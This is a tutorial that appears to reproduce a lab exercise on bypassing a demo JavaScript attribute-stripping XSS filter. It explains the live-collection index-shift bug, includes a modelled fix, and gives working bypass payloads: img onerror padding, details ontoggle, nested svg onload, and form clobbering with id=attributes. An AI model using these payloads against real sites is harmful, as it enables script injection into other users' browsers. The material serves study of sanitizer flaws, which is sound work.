Reproducing the one-loop problem and the two-loop problem
2022-08-06 20:32:00 【golden % sunset】
The one-loop problem
Goal:
In the JS code below, a loop of removeAttribute calls deletes the attributes of the element we insert. Our goal is to bypass that loop with an event attribute, i.e. to make sure the removal does not strip the useful attributes, so that our malicious attribute executes and pops an alert. There are two ways to do this:
The two approaches are:
(1) enter the loop, but have it fail to remove the useful attributes;
(2) do not enter the loop: the malicious attribute executes before the loop runs.
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!-- <form id=x>
        <input id=attributes>
        <input id=attributes>
    </form> -->
</body>
<script>
    // console.info(x.attributes);
    // http://127.0.0.1/domfilter/demo6.html#<img src=1 onerror=alert(1)>
    const data = decodeURIComponent(location.hash.substr(1));
    const root = document.createElement('div');
    root.innerHTML = data;
    // This simulates an XSS filter: it removes every attribute of every element
    for (let el of root.querySelectorAll('*')) {
        for (let attr of el.attributes) {
            el.removeAttribute(attr.name);
        }
    }
    document.body.appendChild(root);
</script>
</html>
Run the code, then use an img tag to pop the alert.
Analysis:
To make removeAttribute delete only the useless attributes, we first need to understand the deletion process.
However, there is a flaw in this deletion code: it removes the first attribute it fetches, src, but does not delete the later onerror attribute. The question is how to use this flaw to bypass the filter so that the event attribute executes and triggers the popup.

From the figure above we can see that the code removed only 3 numbers, although the list contains 6. Why is that?
We analyze it with the following code:
First, number each element of the list in order, starting from 1.
The reason is that the deletion runs inside a loop: the code deletes while iterating.
First iteration: the for loop starts at position 1, finds that the sixth number, 7, is the maximum, selects 7, prints it and deletes it. Now the list is a=[3,4,2,6,5].
Second iteration: the loop has passed the first item, 3, and moved to the second position. It again looks for the largest number, finds 6, and deletes it. Now a=[3,4,2,5]:
the slot of 6 is vacated and 5 moves forward to fill it.
Third iteration: the loop continues from the third item, 2, finds the largest number, 5, and deletes it. Now the list is a=[3,4,2].
Fourth iteration: the loop would continue from the fourth item, but a now has only three elements, not four, so the loop ends.
This explains the behaviour.
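The same index-shift bug applied to the attribute filter, as an added stand-alone example (not code from the original post). LiveAttrs and makeElement are hypothetical stand-ins for the DOM's live NamedNodeMap and Element, modelling only the part the filter touches: removing an entry shifts the later ones up while the iterator index keeps advancing. The snapshot version is the idea behind the post's two-loop variant: copy the names first, then remove.

```javascript
// Hypothetical stand-in for a live NamedNodeMap: array-backed, and like the
// real DOM map the indexes of later entries shift when one is removed.
class LiveAttrs {
  constructor(names) { this.items = names.map(name => ({ name })); }
  get length() { return this.items.length; }
  item(i) { return this.items[i]; }
  remove(name) {
    const i = this.items.findIndex(a => a.name === name);
    if (i !== -1) this.items.splice(i, 1);   // entries after i move up by one
  }
  // Mirrors the DOM iterator: one index per step, read against the live length.
  *[Symbol.iterator]() {
    for (let i = 0; i < this.length; i++) yield this.item(i);
  }
}

// Constructed stand-in for an element with the given attribute names.
function makeElement(attrNames) {
  const attributes = new LiveAttrs(attrNames);
  return { attributes, removeAttribute: name => attributes.remove(name) };
}

// The one-loop filter from the post: deletes while iterating the live map.
// Returns the names that survive, so the skip can be observed.
function stripLive(el) {
  for (const attr of el.attributes) el.removeAttribute(attr.name);
  return Array.from(el.attributes, a => a.name);
}

// Hardened form: snapshot the names first, then remove from the snapshot.
// Every name seen at snapshot time is removed no matter how indexes shift.
function stripSnapshot(el) {
  const names = Array.from(el.attributes, a => a.name);
  for (const name of names) el.removeAttribute(name);
  return Array.from(el.attributes, a => a.name);
}

// Padding attributes before src and onerror make the live loop skip both.
console.log(stripLive(makeElement(['d', 'src', 'f', 'onerror'])));     // [ 'src', 'onerror' ]
console.log(stripSnapshot(makeElement(['d', 'src', 'f', 'onerror']))); // []
```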
Experiments
(1) Enter the loop without removing the useful attributes
For the img tag to pop the alert, both the src and onerror attributes must survive.
So the payload in the address bar becomes:
<img%20 d=aaa src=1 f=sss onerror=alert(1) >

The img tag's src and onerror attributes are preserved: success.
A details tag can also be used.
payload:
<details open ontoggle=alert(1)>

(2) Do not enter the loop: the malicious attribute executes before the loop runs
Besides exploiting the weakness of the single-loop deletion inside one tag, this bypass escapes the loop entirely with nested svg tags, so the malicious attribute fires and pops the alert.
payload:
<svg><svg/onload=alert(1)>

The two-loop problem
The difference between the two-loop deletion and the one-loop deletion is that the attributes are first copied into a new array and then removed in a second loop, which prevents malicious attributes from escaping through the index shift. The goal is again to execute our malicious attribute and pop the alert, in one of two ways.
The two approaches are:
(1) enter the loop without removing the useful attributes;
(2) do not enter the loop.
(1) Enter the loop without removing the useful attributes
For the attributes that enter the loop to take effect, an iterable object must be formed: two tags with the same id/name form an iterable object (an array-like collection). The loop's deletion amounts to reading the form's attributes property, and that id/name is the two input tags with id=attributes, so the loop deletes from the array formed by those two inputs rather than from the form's real attributes. The input tags themselves are not deleted, so the form's tabindex attribute stays locked in place (on the input tags), and onfocus then captures the focus and triggers the popup.
HTML tabindex 属性:https://www.w3school.com.cn/tags/att_standard_tabindex.asp
payload:
<form%20tabindex=1%20onfocus="alert(1)"%20autofocus=true><input%20id=attributes><input%20id=attributes></form>

(2) Do not enter the loop

payload:
#<svg><svg/onload=alert(1)>
Two svg tags are used here because the code then executes the malicious attribute before the loop runs. With a single svg tag the code would only execute the svg tag after the loop has run, and by then every attribute inside the svg tag has already been removed, so it cannot execute.
